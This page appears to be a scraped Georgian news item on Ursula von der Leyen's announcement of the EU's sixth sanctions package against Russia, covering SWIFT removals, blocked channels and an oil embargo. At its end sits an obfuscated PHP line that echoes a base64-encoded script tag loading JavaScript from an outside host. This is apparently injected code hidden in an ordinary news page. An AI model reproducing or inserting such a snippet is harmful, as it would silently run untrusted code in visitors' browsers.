celsiusi
ავერსი შნაიდერი
ევროკომისიის პრეზიდენტის ურსულა ფონ დერ ლაიენი განცხადებით, სანქციების მეექვსე პაკეტი ითვალისწინებს "სბერ ბანკის", "სვიფტიდან" ჩახსნას, მისივე თქმით, იგივე ბედს გაიზიარებს სხვა რუსული ბანკებიც და ეს იქნება რუსეთის ეკონომიკის სრული იზოლაცია.
 
ევროკომისიის პრეზიდენტის განცხადებით, სანქციები შეეხება ასევე ყველა რუსულ ბანკს,  ამასთან, დაიბლოკება სამი რუსული სახელმწიფო არხი.
 
"პუტინმა დიდი საფასური უნდა გადაიხადოს ამ სასტიკი აგრესიისთვის. ევროპის მომავალი ახლა უკრაინაში იწერება. ჩვენ სანქციების მეექვსე პაკეტით სანქციების სიაში შევიყვანთ მაღალი რანგის ოფიციალურ პირებს, ოფიცრებს და იმ პირებს, რომლებმაც წარმოუდგენელი სისასტიკე ჩაიდინეს მარიუპოლში და არიან მომხდარ დანაშაულებში გარეული. ჩვენ ვიცით ვინ ხართ და პასუხისმგებლობას ვერ გაექცევით.
 
"სბერ ბანკი", რომელიც დიდი რუსული ბანკია, მას "სვიფტიდან" ჩავხსნით, იგივე ბედს გაიზიარებს სხვა რუსული ბანკებიც - ეს იქნება რუსეთის ეკონომიკის სრული იზოლაცია.
 
ჩვენ დავბლოკავთ სამ რუსულ სახელმწიფო არხს. ისინი ჩვენ სივრცეში ვერ იმაუწყებლებენ, ვერ გაავრცელებენ პუტინის პროპაგანდას.
 
ნავთობზე ჩვენი დამოკიდებულება უნდა შემცირდეს, ჩვენ დავიწყეთ ქვანახშირით და დღეს ვსაუბრობთ ნავთობზე. ეს არ იქნება მარტივი, რადგან ბევრი ჩვენი ქვეყანა დამოკიდებულია რუსულ ნავთობზე, მაგრამ ჩვენ ავკრძალავთ რუსულ ნავთობს. ეს იქნება სრული ემბარგო. ჩვენ გამოვიყენებთ სხვა ალტერნატივებს, ვიპოვით პროდუქტებს. წლის ბოლოს, ეს იქნება მასიური წნეხი რუსულ პროდუქციაზე.
 
ჩვენ უნდა დავრწმუნდეთ, რომ ჩვენი ეკონომიკა მყარად დგას. უნდა მოვახდინოთ რესურსების დივერსიფიცირება. გვინდა, რომ უკრაინამ გაიმარჯვოს და გვსურს ომის შემდეგ გავაძლიეროთ უკრაინა და მოხდეს მისი აღდგენა," - ამბობს ურსულა ფონ დერ ლაიენი.
686
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");